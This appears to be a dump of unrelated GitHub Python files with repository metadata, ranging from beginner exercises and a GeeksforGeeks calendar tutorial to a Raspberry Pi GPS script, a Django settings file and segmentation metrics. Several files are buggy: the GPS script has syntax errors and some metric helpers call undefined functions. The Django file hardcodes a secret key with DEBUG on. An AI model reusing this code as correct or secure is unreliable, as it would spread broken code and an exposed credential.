d8c24a8144ffcbf9c5ef4a88235c206f31add117 | e87e8dace1d4a19068142d2b3ceff54db6fbad00 | /Python3.8/1040 - Average 3 | 4fd3722eaa7ff858439cbea8a4d7063b1c2271f9 | [] | no_license | ferdousmamun777/Uri-Solution | aab8ce64f58fd0df59fa6e4dd224f7665d1dd865 | f17f704cc7a9a4ad1b4f1e03e68c03ceda52693e | refs/heads/master | 2022-12-01T17:08:46.740555 | 2020-08-10T14:14:25 | 2020-08-10T14:14:25 | 283,682,526 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 538 | n1, n2, n3, n4= input().split()
n1 = float(n1)
n2 = float(n2)
n3 = float(n3)
n4 = float(n4)
media = (n1*2+n2*3+n3*4+n4*1)/10
print('Media: %.1f' %media)
if (media>=7):
print('Aluno aprovado.')
elif(media<5):
print('Aluno reprovado.')
else:
print('Aluno em exame.')
n5 = float(input())
final = (n5+media)/2
print('Nota do exame:', n5)
if (n5>=5):
print('Aluno aprovado.')
print('Media final: %.1f' %final)
else:
print('Aluno reprovado.')
print('Media final: %.1f' % final)
| [
"[email protected]"
] | ||
226640c569bd1ca4c69bbf3aaacc75aeb08d09a6 | c98f9d1254996058586011d24e12f03645963185 | /union, intersection, difference and symmetric difference.py | 4cb4524e8d1bdc9675a8337aa1b29bfda65d060b | [] | no_license | Thamaraikannan-R/set | 8db9e1005ff25a8a69e3ab8cf4788b9768a852f5 | 63cacb5fb0ab678861b939600410391e9de92328 | refs/heads/master | 2020-04-10T04:41:54.813924 | 2018-12-07T10:04:25 | 2018-12-07T10:04:25 | 160,806,238 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py | a = {0, 2, 4, 6, 8}
b = {1, 2, 3, 4, 5}
print("A+B",a.union(b))
print("A and B",a.intersection(b))
print("A-B",a.difference(b))
print("A not B",a.symmetric_difference(b)) | [
"[email protected]"
] | |
6ddae08c21df8c42e44f5e6d4404af25f79849a0 | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/python_all/64_2.py | 5b45ab1e95ee997b47876fb571f3e9db42c2eeed | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,023 | py | Python program to print Calendar without calendar or datetime module
Given the month and year. The task is to show the calendar of that month and
in the given year without using any module or pre-defined functions.
**Examples:**
**Input :**
mm(1-12) :9
yy :2010
**Output :**
September 2010
Su Mo Tu We Th Fr Sa
01 02 03 04
05 06 07 08 09 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30
**Approach:**
In the program below, we first calculate the number of odd days to find the
day of the date 01-mm-yyyy.Then, we take in the year(yy) and the month(mm) as
input and displays the calendar for that month of the year.
Below is the implementation of the given approach.
__
__
__
__
__
__
__
# Python code to print Calendar
# Without use of Calendar module
mm = 2
yy = 2020
month ={1:'January', 2:'February', 3:'March',
4:'April', 5:'May', 6:'June', 7:'July',
8:'August', 9:'September', 10:'October',
11:'November', 12:'December'}
# code below for calculation of odd days
day =(yy-1)% 400
day = (day//100)*5 + ((day % 100) - (day %
100)//4) + ((day % 100)//4)*2
day = day % 7
nly =[31, 28, 31, 30, 31, 30,
31, 31, 30, 31, 30, 31]
ly =[31, 29, 31, 30, 31, 30,
31, 31, 30, 31, 30, 31]
s = 0
if yy % 4 == 0:
for i in range(mm-1):
s+= ly[i]
else:
for i in range(mm-1):
s+= nly[i]
day += s % 7
day = day % 7
# variable used for white space filling
# where date not present
space =''
space = space.rjust(2, ' ')
# code below is to print the calendar
print(month[mm], yy)
print('Su', 'Mo', 'Tu', 'We', 'Th', 'Fr',
'Sa')
if mm == 9 or mm == 4 or mm == 6 or mm
== 11:
for i in range(31 + day):
if i<= day:
print(space, end =' ')
else:
print("{:02d}".format(i-day), end =' ')
if (i + 1)% 7 == 0:
print()
elif mm == 2:
if yy % 4 == 0:
p = 30
else:
p = 29
for i in range(p + day):
if i<= day:
print(space, end =' ')
else:
print("{:02d}".format(i-day), end =' ')
if (i + 1)% 7 == 0:
print()
else:
for i in range(32 + day):
if i<= day:
print(space, end =' ')
else:
print("{:02d}".format(i-day), end =' ')
if (i + 1)% 7 == 0:
print()
---
__
__
**Output:**
February 2020
Su Mo Tu We Th Fr Sa
01
02 03 04 05 06 07 08
09 10 11 12 13 14 15
16 17 18 19 20 21 22
23 24 25 26 27 28 29
Attention geek! Strengthen your foundations with the **Python Programming
Foundation** Course and learn the basics.
To begin with, your interview preparations Enhance your Data Structures
concepts with the **Python DS** Course.
My Personal Notes _arrow_drop_up_
Save
| [
"[email protected]"
] | |
2daf44495a441ace02532763735623f396e93e8f | 62658c46951492bb3e19f7ea25be2c2ee56fa66e | /gps.py | 40d783cceeb9b0de9d0a40923b6d49d0b0494604 | [] | no_license | nishishah/IngeniousHackathon_CodeO-Sapiens | f491cbaa3aced31186d92748402dd43eb7c3ef2c | 51a266ac4b2c4affbd058656583d4f800100732b | refs/heads/master | 2021-01-25T14:16:32.205585 | 2018-03-04T04:34:01 | 2018-03-04T04:34:01 | 123,676,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,324 | py | import time
import serial
import string
import pynmea2
import RPi
GPIO as gpio
# to add the LCD library
import Adafruit_CharLCD as LCD
gpio.setmode(gpio.BCM)
# declaring LCD pins
lcd_rs = 17
lcd_en = 18
lcd_d4 = 27
lcd_d5 = 22
lcd_d6 = 23
lcd_d7 = 10
lcd_backlight = 2
lcd_columns = 16 # Lcd column
lcd_rows = 2 # number of LCD rows
lcd = LCD.Adafruit_CharLCD(
lcd=LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7, lcd_columns, lcd_rows, lcd_backlight)
port = "/dev/ttyAMA0" # the serial port to which the pi is connected.
# create a serial object
ser = serial.Serial(port, baudrate=9600, timeout=0.5)
while 1:
try:
data = ser.readline()
except:
print("loading")
# wait for the serial port to churn out data
if data[0:6] == '$GPGGA': # the long and lat data are always contained in the GPGGA string of the NMEA data
msg = pynmea2.parse(data)
# parse the latitude and print
latval = msg.lat
concatlat = "lat:" + str(latval)
print
concatlat
lcd.set_cursor(0, 0)
lcd.message(concatlat)
# parse the longitude and print
longval = msg.lon
concatlong = "long:" + str(longval)
print
concatlong
lcd.set_cursor(0, 1)
lcd.message(concatlong)
time.sleep(0.5) # wait a little before picking the next data.
| [
"[email protected]"
] | |
c84ddf4da41f9c2db08ce89ab29e9bf4167f1205 | 11952e488001f2adf55fdf65cba35d3e74990bdd | /settings.py | ee42ac8a378aaa7ad885d1fb40b3bfbcf1b9e349 | [] | no_license | JustNikhill/Website-using-Django | 4bd029132f1ac848b82a6ba731c6155e4641fc0e | a93b2bce26d5d39efd86bd96f8d3d57356b0638b | refs/heads/main | 2023-04-23T22:05:28.244070 | 2021-05-02T16:04:52 | 2021-05-02T16:04:52 | 359,555,675 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,218 | py | """
Django settings for pyshop project.
Generated by 'django-admin startproject' using Django 3.1.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'uyczef5p@!3z_w2=i0_xsdq)$-m+5pe#hk0u4e!3nt&1@%16g4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'products.apps.ProductsConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pyshop.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pyshop.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"[email protected]"
] | |
243b00fb792df0d908725a77d369f7a886e958ca | 7319bdc1aa1edd9e37424da47264882753dda919 | /monitor_nomina.py | fde617e7fa6aa3fb079d6c0dc9c7e6ee000411ae | [] | no_license | njmube/satconnect | 4ff81ac132811d2784d82a872be34590f53021db | de421f546a6f7f4cc5f247d1b2ba91ac272bdcb9 | refs/heads/master | 2023-03-18T12:58:18.379008 | 2017-10-24T07:14:05 | 2017-10-24T07:14:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 263 | py | # -*- coding: utf-8 -*-
from LibTools.filesystem import Carpeta
from slaves import SentinelNomina
import settings
if __name__ == '__main__':
carpeta = Carpeta(settings.folder_nomina)
sentinela = SentinelNomina(carpeta)
sentinela.start_Monitoring()
| [
"="
] | = |
1628b9d704c430771ffe07895f60f69d5d03c21c | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nntwelv.py | 4e1af148e299d47bb87a0be2b829ebcc80cee86d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 2,600 | py | ii = [('CookGHP3.py', 8), ('LyelCPG2.py', 4), ('MarrFDI.py', 2), ('RogePAV2.py', 11), ('CoolWHM2.py', 20), ('KembFFF.py', 1), ('GodwWSL2.py', 22), ('RogePAV.py', 4), ('SadlMLP.py', 6), ('WilbRLW.py', 15), ('WilbRLW4.py', 9), ('RennJIT.py', 15), ('ProuWCM.py', 4), ('AubePRP2.py', 28), ('CookGHP.py', 6), ('ShawHDE.py', 6), ('MartHSI2.py', 11), ('LeakWTI2.py', 19), ('UnitAI.py', 9), ('KembFJ1.py', 20), ('WilkJMC3.py', 7), ('WilbRLW5.py', 7), ('LeakWTI3.py', 18), ('PettTHE.py', 14), ('MarrFDI3.py', 7), ('PeckJNG.py', 19), ('BailJD2.py', 5), ('AubePRP.py', 21), ('GellWPT.py', 10), ('AdamWEP.py', 7), ('FitzRNS3.py', 37), ('WilbRLW2.py', 10), ('ClarGE2.py', 54), ('GellWPT2.py', 7), ('WilkJMC2.py', 5), ('CarlTFR.py', 93), ('SeniNSP.py', 4), ('LyttELD.py', 1), ('CoopJBT2.py', 1), ('GrimSLE.py', 1), ('RoscTTI3.py', 2), ('AinsWRR3.py', 4), ('CookGHP2.py', 4), ('KiddJAE.py', 6), ('RoscTTI2.py', 2), ('CoolWHM.py', 27), ('MarrFDI2.py', 2), ('CrokTPS.py', 7), ('ClarGE.py', 47), ('LandWPA.py', 1), ('BuckWGM.py', 13), ('IrviWVD.py', 9), ('LyelCPG.py', 41), ('GilmCRS.py', 5), ('DaltJMA.py', 12), ('WestJIT2.py', 23), ('DibdTRL2.py', 17), ('AinsWRR.py', 2), ('CrocDNL.py', 9), ('MedwTAI.py', 18), ('WadeJEB.py', 38), ('FerrSDO2.py', 2), ('TalfTIT.py', 1), ('NewmJLP.py', 3), ('GodwWLN.py', 10), ('CoopJBT.py', 1), ('KirbWPW2.py', 6), ('SoutRD2.py', 4), ('BackGNE.py', 22), ('LeakWTI4.py', 29), ('LeakWTI.py', 26), ('MedwTAI2.py', 9), ('BachARE.py', 133), ('SoutRD.py', 6), ('DickCSG.py', 1), 
('BuckWGM2.py', 2), ('WheeJPT.py', 27), ('MereHHB3.py', 37), ('HowiWRL2.py', 14), ('BailJD3.py', 1), ('MereHHB.py', 31), ('WilkJMC.py', 24), ('HogaGMM.py', 15), ('MartHRW.py', 9), ('MackCNH.py', 11), ('WestJIT.py', 16), ('BabbCEM.py', 25), ('FitzRNS4.py', 21), ('CoolWHM3.py', 14), ('DequTKM.py', 9), ('FitzRNS.py', 47), ('BentJRP.py', 3), ('LyttELD3.py', 2), ('RoscTTI.py', 11), ('ThomGLG.py', 11), ('StorJCC.py', 16), ('KembFJ2.py', 20), ('LewiMJW.py', 20), ('BabbCRD.py', 3), ('MackCNH2.py', 13), ('JacoWHI2.py', 34), ('SomeMMH.py', 8), ('HaliTBC.py', 1), ('WilbRLW3.py', 20), ('MereHHB2.py', 13), ('BrewDTO.py', 2), ('JacoWHI.py', 29), ('ClarGE3.py', 31), ('RogeSIP.py', 10), ('MartHRW2.py', 8), ('DibdTRL.py', 19), ('FitzRNS2.py', 43), ('HogaGMM2.py', 5), ('MartHSI.py', 10), ('EvarJSP.py', 7), ('DwigTHH.py', 6), ('NortSTC.py', 1), ('SadlMLP2.py', 4), ('BowrJMM2.py', 4), ('LyelCPG3.py', 11), ('BowrJMM3.py', 3), ('BeckWRE.py', 2), ('TaylIF.py', 5), ('WordWYR.py', 1), ('DibdTBR.py', 1), ('ThomWEC.py', 3), ('KeigTSS.py', 20), ('KirbWPW.py', 4), ('WaylFEP.py', 9), ('ClarGE4.py', 77), ('HowiWRL.py', 16)] | [
"[email protected]"
] | |
bb86e6cf9d5e401f16ddddb0dac811d9f2c57d11 | 950bdea00a3ea4090f5f90716359d9c2668d1695 | /google/cloud/bigquery/job/__init__.py | 4c16d0e20219be2ab776a41c971451cebbbdc381 | [
"Apache-2.0"
] | permissive | akamil-etsy/python-bigquery | a01f19258e3522e459d8472315f9ea8b90dd8784 | cf0b0d862e01e9309407b2ac1a48f0bfe23d520d | refs/heads/master | 2023-07-03T22:15:17.427257 | 2021-08-05T14:59:15 | 2021-08-05T14:59:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,188 | py | # Copyright 2015 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Define API Jobs."""
from google.cloud.bigquery.job.base import _AsyncJob
from google.cloud.bigquery.job.base import _error_result_to_exception
from google.cloud.bigquery.job.base import _DONE_STATE
from google.cloud.bigquery.job.base import _JobConfig
from google.cloud.bigquery.job.base import _JobReference
from google.cloud.bigquery.job.base import ReservationUsage
from google.cloud.bigquery.job.base import ScriptStatistics
from google.cloud.bigquery.job.base import ScriptStackFrame
from google.cloud.bigquery.job.base import UnknownJob
from google.cloud.bigquery.job.copy_ import CopyJob
from google.cloud.bigquery.job.copy_ import CopyJobConfig
from google.cloud.bigquery.job.copy_ import OperationType
from google.cloud.bigquery.job.extract import ExtractJob
from google.cloud.bigquery.job.extract import ExtractJobConfig
from google.cloud.bigquery.job.load import LoadJob
from google.cloud.bigquery.job.load import LoadJobConfig
from google.cloud.bigquery.job.query import _contains_order_by
from google.cloud.bigquery.job.query import DmlStats
from google.cloud.bigquery.job.query import QueryJob
from google.cloud.bigquery.job.query import QueryJobConfig
from google.cloud.bigquery.job.query import QueryPlanEntry
from google.cloud.bigquery.job.query import QueryPlanEntryStep
from google.cloud.bigquery.job.query import ScriptOptions
from google.cloud.bigquery.job.query import TimelineEntry
from google.cloud.bigquery.enums import Compression
from google.cloud.bigquery.enums import CreateDisposition
from google.cloud.bigquery.enums import DestinationFormat
from google.cloud.bigquery.enums import Encoding
from google.cloud.bigquery.enums import QueryPriority
from google.cloud.bigquery.enums import SchemaUpdateOption
from google.cloud.bigquery.enums import SourceFormat
from google.cloud.bigquery.enums import WriteDisposition
# Include classes previously in job.py for backwards compatibility.
__all__ = [
"_AsyncJob",
"_error_result_to_exception",
"_DONE_STATE",
"_JobConfig",
"_JobReference",
"ReservationUsage",
"ScriptStatistics",
"ScriptStackFrame",
"UnknownJob",
"CopyJob",
"CopyJobConfig",
"OperationType",
"ExtractJob",
"ExtractJobConfig",
"LoadJob",
"LoadJobConfig",
"_contains_order_by",
"DmlStats",
"QueryJob",
"QueryJobConfig",
"QueryPlanEntry",
"QueryPlanEntryStep",
"ScriptOptions",
"TimelineEntry",
"Compression",
"CreateDisposition",
"DestinationFormat",
"Encoding",
"QueryPriority",
"SchemaUpdateOption",
"SourceFormat",
"WriteDisposition",
]
| [
"[email protected]"
] | |
a97f5084296f2d3ee5ab642a3f8b277181382173 | 8aa8d7f742eaba0f89d70ef42918e076be01bae6 | /YR/week3/problem263.py | 30a7b99b382dedbb7fbb099f89f217a9af37700a | [] | no_license | robin9804/RoadToDeepLearningKing | d88a49995b836cb49ce680a0d385a1bb2ae87e99 | fe8695b0d8d7beb5d64d450806e7866a3b103875 | refs/heads/main | 2023-03-19T03:10:16.223113 | 2021-03-11T07:31:09 | 2021-03-11T07:31:09 | 325,275,554 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | # problem 263
N, M = list(input("enter the ints : ").split())
N, M = int(N), int(M)
def sum_list(l1, l2):
lists = []
for i in l1:
for j in l2:
lists.append(i + j)
return lists
def func(N ,M):
lists = []
if N == 1:
if M in range(1, 7):
return [[M]]
else:
return False
else:
for i in range(1, 7):
if func(N-1, M-i) != False:
lists += sum_list([[i]], func(N-1, M-i))
return lists
print(func(N, M))
print(len(func(N, M))) | [
"[email protected]"
] | |
8b937f748ecd23a5a902c0f78026fc265309d665 | 6bbfd303dbacc21a2443e681aea5c1a1c21b872d | /pytorch/evaluation/evaluation_segm.py | e8c4b838a59872954ed5e09b055df73f0933ccfb | [] | no_license | gregoryperkins/PC-Reg-RT | fbba9d4f9c55b7e2e9068e8f8a55fc1eba3c76a8 | 7d70ca97019cc7ddc374ffd962e0f63391ec181d | refs/heads/main | 2023-09-04T02:58:42.843287 | 2021-10-16T07:19:25 | 2021-10-16T07:19:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,348 | py | import numpy as np
import torch
import SimpleITK as sitk
def GetSD(predict,label):
predict = predict.astype(np.uint8)
label = label.astype(np.uint8)
mask1 = sitk.GetImageFromArray(predict,isVector=False)
mask2 = sitk.GetImageFromArray(label,isVector=False)
hausdorff_distance_filter = sitk.HausdorffDistanceImageFilter()
hausdorff_distance_filter.Execute(mask1, mask2)
ave_distance = hausdorff_distance_filter.GetAverageHausdorffDistance()
idx_predict = np.where(predict!=0)
sum=0
print(np.size(idx_predict[0]))
for i in range(np.size(idx_predict[0])):
mask_temp = np.zeros_like(predict,dtype=np.uint8)
mask_temp[idx_predict[0][i]][idx_predict[1][i]][idx_predict[2][i]]=1
mask_temp = sitk.GetImageFromArray(mask_temp,isVector=False)
hausdorff_distance_filter = sitk.HausdorffDistanceImageFilter()
hausdorff_distance_filter.Execute(mask_temp, mask2)
distance_pixel = hausdorff_distance_filter.GetHausdorffDistance()
sum=sum+np.square(distance_pixel-ave_distance)
result=np.sqrt(sum/np.size(idx_predict[0]))
return result
def Getcontour(img):
    """Binary contour of *img* extracted with SimpleITK, returned as uint8."""
    itk_image = sitk.GetImageFromArray(img.astype(np.uint8), isVector=False)
    contour = sitk.SimpleContourExtractorImageFilter().Execute(itk_image)
    return sitk.GetArrayFromImage(contour).astype(np.uint8)
def GetMaxConponent(img, index=1):
    """Largest connected component of the binary mask (img == index).

    Returns a uint8 volume in which the largest component keeps the value
    *index* and everything else is 0; an all-zero volume when the label is
    absent.  (sic: "Conponent" typo kept for existing callers.)
    """
    if img.max() < index:
        # Label not present at all — nothing to extract.
        return np.zeros_like(img,dtype=np.uint8)
    image = sitk.GetImageFromArray((img == index).astype(np.uint8),isVector=False)
    filter = sitk.ConnectedComponentImageFilter()  # (sic: shadows builtin 'filter')
    image = filter.Execute(image)
    image = sitk.GetArrayFromImage(image).astype(np.uint8)
    # Scan component labels 1..max for the one with the most voxels.
    maxindex = 0
    max_sum = 0
    for i in range(1, image.max()+1):
        temp = (image == i).sum()
        if temp > max_sum:
            max_sum = temp
            maxindex = i
    if maxindex == 0:
        return np.zeros_like(img, dtype=np.uint8)
    else:
        # Re-label the winning component with the requested index value.
        return (image == maxindex).astype(np.uint8) * index
def GrayMorphologicalClosingImage(img):
    """Grayscale morphological closing of *img* via SimpleITK; returns uint8."""
    itk_image = sitk.GetImageFromArray(img.astype(np.uint8), isVector=False)
    closed = sitk.GrayscaleMorphologicalClosingImageFilter().Execute(itk_image)
    return sitk.GetArrayFromImage(closed).astype(np.uint8)
def HausdorffDistance(predict, label, index=1):
    """Hausdorff distances between the *index* masks of two label volumes.

    Returns a 2-tuple ``(hausdorff, average_hausdorff)`` in voxel units.
    When either mask is empty the tuple degenerates to sentinel strings:
    ('FP','FP') if only the prediction is non-empty, ('FN','FN') if only
    the ground truth is non-empty, ('TN','TN') if both are empty.
    """
    predict = (predict == index).astype(np.uint8)
    label = (label == index).astype(np.uint8)
    predict_sum = predict.sum()
    label_sum = label.sum()
    if predict_sum != 0 and label_sum != 0 :
        mask1 = sitk.GetImageFromArray(predict,isVector=False)
        mask2 = sitk.GetImageFromArray(label,isVector=False)
        hausdorff_distance_filter = sitk.HausdorffDistanceImageFilter()
        hausdorff_distance_filter.Execute(mask1, mask2)
        result1 = hausdorff_distance_filter.GetHausdorffDistance()
        result2 = hausdorff_distance_filter.GetAverageHausdorffDistance()
        result = result1,result2
    elif predict_sum != 0 and label_sum == 0:
        result = 'FP','FP'
    elif predict_sum == 0 and label_sum != 0:
        result = 'FN','FN'
    else:
        result = 'TN','TN'
    return result
def dice3D(eval_segm, gt_segm, index=1):
    '''
    Dice coefficient of the voxels equal to *index* in the two volumes.

    Accepts numpy arrays or torch tensors.  Returns a float, or the
    sentinel strings 'FP' / 'FN' / 'TN' when the predicted and/or
    ground-truth mask is empty.
    '''
    if type(eval_segm) == np.ndarray:
        eval_segm = torch.from_numpy(eval_segm).byte()
    if type(gt_segm) == np.ndarray:
        gt_segm = torch.from_numpy(gt_segm).byte()
    eps = 1e-6
    pred_mask = (eval_segm == index)
    true_mask = (gt_segm == index)
    pred_count = pred_mask.sum().item()
    true_count = true_mask.sum().item()
    if pred_count != 0 and true_count != 0:
        overlap = torch.sum(pred_mask * true_mask).item()
        denom = pred_count + true_count + eps
        return 2.0 * overlap / denom
    if pred_count != 0:
        return 'FP'
    if true_count != 0:
        return 'FN'
    return 'TN'
def jaccard(eval_segm, gt_segm, index=1):
    '''
    Jaccard index (IoU) of the voxels equal to *index* in the two volumes.

    Accepts numpy arrays or torch tensors.  Returns a float, or the
    sentinel strings 'FP' / 'FN' / 'TN' when the predicted and/or
    ground-truth mask is empty (mirroring dice3D).

    Bug fix: the original zeroed/overwrote torch-tensor arguments in place
    (``eval_segm[eval_segm != index] = 0`` ...), silently mutating the
    caller's data; this version builds boolean masks instead, like dice3D,
    and leaves both inputs untouched.
    '''
    if type(eval_segm) == np.ndarray:
        eval_segm = torch.from_numpy(eval_segm.copy()).byte()
    if type(gt_segm) == np.ndarray:
        gt_segm = torch.from_numpy(gt_segm.copy()).byte()
    eps = 1e-6
    eval_mask = (eval_segm == index)
    gt_mask = (gt_segm == index)
    sum_eval = eval_mask.sum().item()
    sum_gt = gt_mask.sum().item()
    if sum_eval != 0 and sum_gt != 0:
        intersection = torch.sum(eval_mask * gt_mask).item()
        union = sum_eval + sum_gt - intersection + eps
        jaccard_ = intersection / union
    elif sum_eval != 0 and sum_gt == 0:
        jaccard_ = 'FP'
    elif sum_eval == 0 and sum_gt != 0:
        jaccard_ = 'FN'
    else:
        jaccard_ = 'TN'
    return jaccard_
def pixel_accuracy_ex(eval_segm, gt_segm):
    '''
    Mean per-slice pixel accuracy over stacks shaped (N_slice, height, width).

    NOTE(review): relies on a ``pixel_accuracy`` function that is neither
    defined nor imported in this module, so calling this raises NameError —
    confirm the intended import.
    '''
    assert (eval_segm.shape == gt_segm.shape)
    num = eval_segm.shape[0]
    result = np.zeros((num), np.float32)
    for i in range(num):
        result[i] = pixel_accuracy(eval_segm[i, ...], gt_segm[i, ...])
    return result.mean()
def mean_accuracy_ex(eval_segm, gt_segm):
    '''
    Mean per-slice class accuracy over stacks shaped (N_slice, height, width).

    NOTE(review): relies on a ``mean_accuracy`` function that is neither
    defined nor imported in this module, so calling this raises NameError —
    confirm the intended import.
    '''
    assert(eval_segm.shape == gt_segm.shape)
    num = eval_segm.shape[0]
    result = np.zeros((num), np.float32)
    for i in range(num):
        result[i] = mean_accuracy(eval_segm[i, ...], gt_segm[i, ...])
    return result.mean()
def mean_IU_ex(eval_segm, gt_segm):
    '''
    Average of mean_IU computed slice-by-slice over stacks shaped
    (N_slice, height, width).
    '''
    assert eval_segm.shape == gt_segm.shape
    scores = np.array([mean_IU(pred, truth)
                       for pred, truth in zip(eval_segm, gt_segm)],
                      dtype=np.float32)
    return scores.mean()
def frequency_weighted_IU_ex(eval_segm, gt_segm):
    '''
    Mean per-slice frequency-weighted IU over stacks shaped
    (N_slice, height, width).

    NOTE(review): relies on a ``frequency_weighted_IU`` function that is
    neither defined nor imported in this module, so calling this raises
    NameError — confirm the intended import.
    '''
    assert (eval_segm.shape == gt_segm.shape)
    num = eval_segm.shape[0]
    result = np.zeros((num), np.float32)
    for i in range(num):
        result[i] = frequency_weighted_IU(eval_segm[i, ...], gt_segm[i, ...])
    return result.mean()
def mean_IU(eval_segm, gt_segm):
    '''
    Mean intersection-over-union:
    (1/n_cl) * sum_i(n_ii / (t_i + sum_j(n_ji) - n_ii)),
    averaged over the classes present in the ground truth.
    '''
    check_size(eval_segm, gt_segm)
    classes, n_classes = union_classes(eval_segm, gt_segm)
    _, n_gt_classes = extract_classes(gt_segm)
    pred_masks, true_masks = extract_both_masks(eval_segm, gt_segm, classes, n_classes)
    per_class_iou = [0] * n_classes
    for idx in range(n_classes):
        pred = pred_masks[idx, ...]
        truth = true_masks[idx, ...]
        # A class absent from either volume contributes 0 to the sum.
        if np.sum(pred) == 0 or np.sum(truth) == 0:
            continue
        overlap = np.sum(np.logical_and(pred, truth))
        denom = np.sum(truth) + np.sum(pred) - overlap
        per_class_iou[idx] = overlap / denom
    return np.sum(per_class_iou) / n_gt_classes
def extract_classes(segm):
    '''Return the sorted unique labels of *segm* and how many there are.'''
    labels = np.unique(segm)
    return labels, len(labels)
def union_classes(eval_segm, gt_segm):
    '''Union of the labels appearing in either segmentation, plus its size.'''
    merged = np.union1d(np.unique(eval_segm), np.unique(gt_segm))
    return merged, len(merged)
def check_size(eval_segm, gt_segm):
    # Guard: both volumes must share the same shape before any comparison.
    assert eval_segm.shape == gt_segm.shape
def extract_masks(segm, cl, n_cl):
    '''Per-class binary masks: an (n_cl, slices, h, w) float array whose
    plane i is the one-vs-rest mask of label cl[i].'''
    n_slices, height, width = segm.shape
    masks = np.zeros((n_cl, n_slices, height, width))
    for plane, label in enumerate(cl):
        masks[plane, ...] = (segm == label)
    return masks
def extract_both_masks(eval_segm, gt_segm, cl, n_cl):
    '''Build the per-class mask stacks for prediction and ground truth.'''
    return extract_masks(eval_segm, cl, n_cl), extract_masks(gt_segm, cl, n_cl)
'''
Exceptions
'''
class EvalSegErr(Exception):
    """Error raised for invalid segmentation-evaluation inputs.

    Stores the offending value/message in ``self.value`` and echoes it
    (via repr) when the exception is printed.
    """
    def __init__(self, value):
        self.value = value
    def __str__(self):
        return repr(self.value)
| [
"[email protected]"
] | |
